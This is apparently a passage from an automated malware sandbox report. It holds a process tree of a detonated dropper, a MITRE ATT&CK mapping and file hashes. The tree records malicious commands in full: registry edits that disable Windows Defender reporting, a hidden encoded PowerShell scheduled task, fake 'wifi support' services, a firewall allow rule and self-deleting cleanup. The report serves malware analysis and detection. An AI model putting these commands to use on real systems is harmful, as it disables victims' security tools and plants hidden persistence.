                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                  9⤵
                                                                                                                    PID:5240
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                      10⤵
                                                                                                                        PID:5616
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                        10⤵
                                                                                                                          PID:5372
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /CREATE /TN "ggbtqdHML" /SC once /ST 11:07:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                      8⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:5412
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks /run /I /tn "ggbtqdHML"
                                                                                                                      8⤵
                                                                                                                        PID:6000
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "ggbtqdHML"
                                                                                                                        8⤵
                                                                                                                          PID:5720
                                                                                                                  • C:\Users\Admin\Documents\EG9MOdFOMOGLpVBC5bYy2viX.exe
                                                                                                                    "C:\Users\Admin\Documents\EG9MOdFOMOGLpVBC5bYy2viX.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4584
                                                                                                                  • C:\Users\Admin\Documents\7w3PLkomrMSepWfmF_6ynrqE.exe
                                                                                                                    "C:\Users\Admin\Documents\7w3PLkomrMSepWfmF_6ynrqE.exe"
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    PID:4840
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                      6⤵
                                                                                                                        PID:1732
                                                                                                                    • C:\Users\Admin\Documents\lhurjQzq4yW4ztXu9TyqDhdk.exe
                                                                                                                      "C:\Users\Admin\Documents\lhurjQzq4yW4ztXu9TyqDhdk.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3428
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xrpwugnu\
                                                                                                                        6⤵
                                                                                                                          PID:4984
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ernpmqry.exe" C:\Windows\SysWOW64\xrpwugnu\
                                                                                                                          6⤵
                                                                                                                            PID:864
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            "C:\Windows\System32\sc.exe" create xrpwugnu binPath= "C:\Windows\SysWOW64\xrpwugnu\ernpmqry.exe /d\"C:\Users\Admin\Documents\lhurjQzq4yW4ztXu9TyqDhdk.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                            6⤵
                                                                                                                              PID:2788
                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                              "C:\Windows\System32\sc.exe" description xrpwugnu "wifi internet conection"
                                                                                                                              6⤵
                                                                                                                                PID:3348
                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                "C:\Windows\System32\sc.exe" start xrpwugnu
                                                                                                                                6⤵
                                                                                                                                  PID:2184
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    PID:1920
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                  6⤵
                                                                                                                                    PID:1176
                                                                                                                                  • C:\Users\Admin\ydyxvzrq.exe
                                                                                                                                    "C:\Users\Admin\ydyxvzrq.exe" /d"C:\Users\Admin\Documents\lhurjQzq4yW4ztXu9TyqDhdk.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:396
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xgpfmddw\
                                                                                                                                        7⤵
                                                                                                                                          PID:5212
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yldzleh.exe" C:\Windows\SysWOW64\xgpfmddw\
                                                                                                                                          7⤵
                                                                                                                                            PID:5476
                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                            "C:\Windows\System32\sc.exe" create xgpfmddw binPath= "C:\Windows\SysWOW64\xgpfmddw\yldzleh.exe /d\"C:\Users\Admin\ydyxvzrq.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                            7⤵
                                                                                                                                              PID:5664
                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                              "C:\Windows\System32\sc.exe" description xgpfmddw "wifi internet conection"
                                                                                                                                              7⤵
                                                                                                                                                PID:5860
                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                "C:\Windows\System32\sc.exe" start xgpfmddw
                                                                                                                                                7⤵
                                                                                                                                                  PID:6064
                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                  7⤵
                                                                                                                                                    PID:448
                                                                                                                                                  • C:\Users\Admin\viegdhip.exe
                                                                                                                                                    "C:\Users\Admin\viegdhip.exe" /d"C:\Users\Admin\ydyxvzrq.exe"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5640
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ilbatvcf.exe" C:\Windows\SysWOW64\xrpwugnu\
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5140
                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                          "C:\Windows\System32\sc.exe" config xrpwugnu binPath= "C:\Windows\SysWOW64\xrpwugnu\ilbatvcf.exe /d\"C:\Users\Admin\viegdhip.exe\""
                                                                                                                                                          8⤵
                                                                                                                                                            PID:4768
                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                            "C:\Windows\System32\sc.exe" start xrpwugnu
                                                                                                                                                            8⤵
                                                                                                                                                              PID:4700
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 1244
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5384
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 1428
                                                                                                                                                          6⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:5044
                                                                                                                                                      • C:\Users\Admin\Documents\HrBzTFjww_B1qNUZYJmqVpwt.exe
                                                                                                                                                        "C:\Users\Admin\Documents\HrBzTFjww_B1qNUZYJmqVpwt.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4928
                                                                                                                                                        • C:\Users\Admin\Documents\HrBzTFjww_B1qNUZYJmqVpwt.exe
                                                                                                                                                          "C:\Users\Admin\Documents\HrBzTFjww_B1qNUZYJmqVpwt.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:4836
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 536
                                                                                                                                                              7⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:4980
                                                                                                                                                        • C:\Users\Admin\Documents\sQZT2tZEyrKl4a8ynClgUD19.exe
                                                                                                                                                          "C:\Users\Admin\Documents\sQZT2tZEyrKl4a8ynClgUD19.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4044
                                                                                                                                                        • C:\Users\Admin\Documents\nvswz0Iad0r4DZLmdBvZVdIM.exe
                                                                                                                                                          "C:\Users\Admin\Documents\nvswz0Iad0r4DZLmdBvZVdIM.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          PID:2800
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:3168
                                                                                                                                                          • C:\Users\Admin\Documents\t4k2OzSoxLn8Dfr9NgnyPEt8.exe
                                                                                                                                                            "C:\Users\Admin\Documents\t4k2OzSoxLn8Dfr9NgnyPEt8.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2260
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im t4k2OzSoxLn8Dfr9NgnyPEt8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\t4k2OzSoxLn8Dfr9NgnyPEt8.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                              6⤵
                                                                                                                                                                PID:3512
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /im t4k2OzSoxLn8Dfr9NgnyPEt8.exe /f
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:6108
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /t 6
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:5928
                                                                                                                                                            • C:\Users\Admin\Documents\qF9foO5gWzzo67Aof__xFh9r.exe
                                                                                                                                                              "C:\Users\Admin\Documents\qF9foO5gWzzo67Aof__xFh9r.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              PID:4768
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im qF9foO5gWzzo67Aof__xFh9r.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\qF9foO5gWzzo67Aof__xFh9r.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:5184
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /im qF9foO5gWzzo67Aof__xFh9r.exe /f
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:5140
                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /t 6
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:5568
                                                                                                                                                              • C:\Users\Admin\Documents\ouDiPw23SQtNZM7IrPz8fA7q.exe
                                                                                                                                                                "C:\Users\Admin\Documents\ouDiPw23SQtNZM7IrPz8fA7q.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                PID:3044
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:3620
                                                                                                                                                                • C:\Users\Admin\Documents\_dIgkUt9SPVOjOMCh1qhinh4.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\_dIgkUt9SPVOjOMCh1qhinh4.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4072
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c timeout 45
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4680
                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                        timeout 45
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:5152
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:1008
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_6.exe
                                                                                                                                                                  sahiba_6.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:3712
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:3216
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_5.exe
                                                                                                                                                                  sahiba_5.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:3788
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-KNNU8.tmp\sahiba_5.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-KNNU8.tmp\sahiba_5.tmp" /SL5="$30116,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_5.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:1884
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c sahiba_4.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:2440
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_4.exe
                                                                                                                                                                  sahiba_4.exe
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:3664
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_4.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS434544AD\sahiba_4.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4160
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 568
                                                                                                                                                                3⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:2436
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1720 -ip 1720
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1752
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5032 -ip 5032
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4916
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3892 -ip 3892
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2388
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5032 -ip 5032
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5004
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4836 -ip 4836
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4248
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3892 -ip 3892
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4156
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3892 -ip 3892
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4212
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3892 -ip 3892
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2000
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3892 -ip 3892
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4976
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3428 -ip 3428
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:2788
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3892 -ip 3892
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3224
                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 600 -p 1032 -ip 1032
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3416
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1628 -ip 1628
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3216
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3892 -ip 3892
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5336
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1628 -ip 1628
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5600
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1232
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3892 -ip 3892
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4396
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1628 -ip 1628
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5416
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 396 -ip 396
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5536
                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 384 -p 5584 -ip 5584
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1628 -ip 1628
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4700
                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                      PID:2144

                                                                                                                                                                                                    Network

                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                    Execution

                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1053

                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                    2
                                                                                                                                                                                                    T1031

                                                                                                                                                                                                    New Service

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1050

                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1053

                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                    New Service

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1050

                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1053

                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                    2
                                                                                                                                                                                                    T1112

                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1089

                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1497

                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1130

                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1081

                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                    4
                                                                                                                                                                                                    T1012

                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1497

                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                    5
                                                                                                                                                                                                    T1082

                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1120

                                                                                                                                                                                                    Collection

                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1005

                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                    1
                                                                                                                                                                                                    T1102

                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      a4482311f0e959aaf17e749f9fc717e4

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      a0468689aa1de7ed56702851a09630e23bc9c1b3

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      ce1d1018d3e6040955488267b5e15e9004f2daa433327f26a1b9e8a0e331855e

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      22d674a8175f5121dacfdd4a4093c8102a5b98cc36c4894340edb4dad58c48ddf26d11a3e4793f6114f8569aa2a4c6adf75c8cc537ae6f0691f469b0f6bcd6fe

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\libcurl.dll
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\libcurl.dll
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\libcurl.dll
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\libcurlpp.dll
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS434544AD\libcurlpp.dll
                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                      SHA512

